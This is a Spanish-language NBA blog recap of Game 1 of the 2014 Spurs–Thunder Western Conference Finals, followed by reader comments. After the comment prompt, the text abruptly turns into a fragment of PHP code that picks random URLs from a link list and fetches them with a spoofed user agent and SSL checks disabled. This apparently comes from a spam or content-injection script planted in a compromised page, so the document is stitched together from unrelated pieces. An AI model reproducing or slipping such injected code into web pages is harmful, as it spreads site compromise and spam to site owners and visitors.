La Crónica: San Antonio golpea fuerte.

20 de May de 2014 por Simon

Primer partido de la gran final del Oeste entre los dos mejores equipos por balance de la liga que se resolvió con clara victoria local. Los Spurs golpearon primero y lo hicieron de manera contundente, de hecho la sensación que nos ha quedado tras este primer partido es que los Thunder fueron enviados a la lona en el primer golpe.

La baja de Ibaka se tornó aún más fundamental de lo que esperábamos. Sin Ibaka los interiores de los Spurs camparon a sus anchas por la zona de los de Scott Brooks que en este primer partido no fue capaz de buscar una mínima alternativa eficaz para poner en aprieto a los Spurs.  San Antonio movió el balón con suma precisión y con su característico juego coral desmontó la resistencia del rival desde el primer tiempo. Los Thunder por su parte fueron capaces de aguantar el temporal gracias a los ráfagas de inspiración que venían a Durant y a un Derek Fisher que apareció de nuevo para aguantar durante algunas fases de la primera parte la anotación de Thunder.

En el tercer cuarto asistimos a uno de esos momentos de inspiración que tienen los Thunder que les hacen imparables y esta vez liderados por Westbrook consiguieron incluso voltear el marcador y ponerse por delante mediado el tercer cuarto. Pero fue en ese momento cuando los Spurs demostraron que tenían una marcha más y con Ginobili como comandante de la reacción pusieron de nuevo tierra de por medio con el rival logrando asegurarse una primera victoria cómoda y sin demasiados sobresaltos (105-122).

Es cierto que el primer partido muchas veces suele ser una toma de contacto y que el devenir final puede cambiar mucho con los ajustes que se realizan a partir del segundo pero ayer los Thunder probaron hasta con Durant jugando por ciertos momentos como teórico center del equipo en una medida desesperada de Brooks el cual tiene una labor complicadísima, aún más cuando nunca ha demostrado ser capaz de adaptarse o presentar una guión distinto que ir al ritmo que marquen Westbrook y Durant.

MVP: Tim Duncan, marcando territorio. Si alguien tenía dudas de cual iba a ser el efecto de la ausencia de Ibaka, su excelencia se apresuró a despejarlas. 27 puntos, 7 rebotes, 3 asistencias. Veo mucho dolor.

La sorpresa: Llevamos tantos años enterrando a Fisher que ni nos acordamos. El Pescador, con sus límites, es de los que rara vez te dejan tirado cuando le necesitas… especialmente en playoffs y en situaciones desesperadas. El genio incomprendido… ayer 16 puntos, con 4 de 6 en triples. 2 rebotes, 2 robos y 1 asistencia.

La decepción: Esperar a estas alturas que Kedrick Perkins te puede inclinar un partido a tu favor en defensa es de ilusos… pero es que anoche tampoco lo lograron notables defensores como Nick Collison o el rookie Adams. Alerta roja en Oklahoma.

El mayor esfuerzo en vano: El mejor jugador del año estuvo muy bien a pesar de todo. Con Leonard encima suyo más las eficaces ayudas de los Spurs, aún fue capaz de anotar 28 puntos con buenos porcentajes, 9 rebotes, 5 asistencias y 1 tapón. Eso sí, perdió 6 balones y de center no le vemos.

Comenta

7 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    #otroanilloparaTim

      Citar

  2. Nacho dice:
    #2

    Comparto el anillo para todos los Spurs.
    No comparto la demonización a Brooks. Cierto que no es Pop, Phil o Doc. Pero cuando hace dos años los Thunder se asomaron a las finales, los Spurs arrasaron en todas sus series y se pusieron 2-0 ante OKC y al volver a casa Scott ajusto la defensa y unos Spurs imparables fueron sencillamente inoperantes. Y Thunder ganó la conferencia 2-4.
    Obviamente Pop aprendió la lección, Parker y Ginobili también. Dudo que Brooks pueda repetirlo, pero ahí están los antecedentes. Y estos Thunder, aunque nos desesperen, son algo más que Durant y Westbrook. Aunque la baja de Ibaka les lastra mucho, y las ganas de anillo en San Antonio son demasiadas, y pronostico un 4-1. Pero de los Thunder no te muedes fíar.

      Citar

  3. Lucho dice:
    #3

    Totalmente de acuerdo con Nacho
    Yo tambien me acuerdo la gran serie que hizo Brooks en ese entonces. Fue la clave para que lo den vuelta
    Que ahora no lo pueda volver a hacer (quien sabe) no significa que ese antecedente se evapore

      Citar

  4. Ruxixon dice:
    #4

    #otroanilloparaTimperoquenoseretirepordios

      Citar

  5. Jose Luis dice:
    #5

    Pues creo que el resultado es bastante engañoso… los Thunder supieron aguantar tras los primeros minutos y capear el temporal, e incluso ponerse por delante en el tercer cuarto… se nota la falta de Ibaka en defensa, pero mucho. Algunas pérdidas les lastraron al final, pero no vi a unos Spurs tan superiores como indica el marcador.

      Citar

  6. Esteban dice:
    #6

    hace dos años atras no arranco la serie de forma parecida y los Spurs vencieron 4-1?

      Citar

  7. Nacho dice:
    #7

    Esteban:
    hace dos años atras no arranco la serie de forma parecida y los Spurs vencieron 4-1?

    La wikipedia sirve para algo de vez en cuando
    http://es.wikipedia.org/wiki/Playoffs_NBA_2012#Finales_de_Conferencia:_.281.29_San_Antonio_Spurs_vs._.282.29_Oklahoma_City_Thunder

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>